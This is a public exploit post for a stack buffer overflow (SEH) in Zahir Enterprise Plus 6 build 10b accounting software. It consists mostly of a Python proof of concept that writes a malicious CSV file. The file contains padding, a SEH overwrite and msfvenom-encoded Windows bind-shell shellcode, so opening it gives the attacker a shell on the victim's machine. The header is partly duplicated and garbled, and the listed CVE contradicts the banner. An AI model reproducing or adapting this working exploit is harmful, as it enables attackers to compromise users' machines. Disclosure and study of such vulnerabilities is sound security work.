Zahir Enterprise Plus 6 Build 10b Buffer Overflow

# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
# Google Dork: -
# Date: 2018-09-28
# Exploit Author: modpr0be
# Vendor Homepage: http://www.zahiraccount # Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
# Google Dork: -
# Date: 2018-09-28
# Exploit Author: modpr0be
# Vendor Homepage: http://www.zahiraccounting.com/
# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
# Tested on: Windows 7 x86/64bit
# CVE : N/A
# Category: local & privilege escalation
#
# Description
# Vulnerability occurs when the Zahir cannot handle large inputs and anomalies crafted CSV file.
# The Zahir main program failed to process the CR LF (Carriage Return Line Feed) characters which
# caused the Zahir main program to crash.
#
# Credits to f3ci, who found the vulnerability.
#
# Proof of Concept
#!/usr/bin/python

import struct

# msfvenom -p windows/shell_bind_tcp -a x86 -b 'x00x0ax0dx22x2c'
# -n 20 -e x86/shikata_ga_nai -f python -v sc
# we won't worry about the space, it's big enough!
# badchars are 00,0a,0d,22,2c
sc = ""
sc += "x92x91xf5x99x98xf5xd6x48x48x3fx2fx99x4a"
sc += "x42x9fx2fx42x43x43x42xb8x8cxa3xb1xa0xdd"
sc += "xc0xd9x74x24xf4x5bx31xc9xb1x53x31x43x12"
sc += "x83xc3x04x03xcfxadx53x55x33x59x11x96xcb"
sc += "x9ax76x1ex2exabxb6x44x3bx9cx06x0ex69x11"
sc += "xecx42x99xa2x80x4axaex03x2exadx81x94x03"
sc += "x8dx80x16x5exc2x62x26x91x17x63x6fxccxda"
sc += "x31x38x9ax49xa5x4dxd6x51x4ex1dxf6xd1xb3"
sc += "xd6xf9xf0x62x6cxa0xd2x85xa1xd8x5ax9dxa6"
sc += "xe5x15x16x1cx91xa7xfex6cx5ax0bx3fx41xa9"
sc += "x55x78x66x52x20x70x94xefx33x47xe6x2bxb1"
sc += "x53x40xbfx61xbfx70x6cxf7x34x7exd9x73x12"
sc += "x63xdcx50x29x9fx55x57xfdx29x2dx7cxd9x72"
sc += "xf5x1dx78xdfx58x21x9ax80x05x87xd1x2dx51"
sc += "xbaxb8x39x96xf7x42xbaxb0x80x31x88x1fx3b"
sc += "xddxa0xe8xe5x1axc6xc2x52xb4x39xedxa2x9d"
sc += "xfdxb9xf2xb5xd4xc1x98x45xd8x17x34x4dx7f"
sc += "xc8x2bxb0x3fxb8xebx1axa8xd2xe3x45xc8xdc"
sc += "x29xeex61x21xd2x01x2exacx34x4bxdexf8xef"
sc += "xe3x1cxdfx27x94x5fx35x10x32x17x5fxa7x3d"
sc += "xa8x75x8fxa9x23x9ax0bxc8x33xb7x3bx9dxa4"
sc += "x4dxaaxecx55x51xe7x86xf6xc0x6cx56x70xf9"
sc += "x3ax01xd5xcfx32xc7xcbx76xedxf5x11xeexd6"
sc += "xbdxcdxd3xd9x3cx83x68xfex2ex5dx70xbax1a"
sc += "x31x27x14xf4xf7x91xd6xaexa1x4exb1x26x37"
sc += "xbdx02x30x38xe8xf4xdcx89x45x41xe3x26x02"
sc += "x45x9cx5axb2xaax77xdfxc2xe0xd5x76x4bxad"
sc += "x8cxcax16x4ex7bx08x2fxcdx89xf1xd4xcdxf8"
sc += "xf4x91x49x11x85x8ax3fx15x3axaax15"

junk = "A" * 3041
junk += ' '
junk += 'A' * 380
junk += "xebx08x90x90" # nseh
junk += struct.pack('<L',0x52016661) #seh pop ecx # pop ebp # ret 0x04 (C:Program Filesahir Personal 6 - Demo Versionvclie100.bpl)
junk += 'x90x90x90x90'
junk += sc
junk += "D" * (5000-len(junk))

print """
#===============================================================================#
| ____ __ |
| / __/__ ___ ___ / /____ _______ _ |
| _ / _ / -_) _ / __/ -_) __/ _ `/ |
| /___/ .__/\__/_//_/\__/\__/_/ \_,_/ |
| /_/ |
| |
| Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day) |
| CVE-2018-17408 |
| by modpr0be & f3ci (research[at]spentera.com) |
#===============================================================================#
"""
print "[+] Preparing for file.."
f = open('exploit.csv', 'w')
print "[+] Writing exploit code on a CSV file.."
f.write(junk)
f.close()
print "[+] Success writing file.. bring to Mr. Zahir."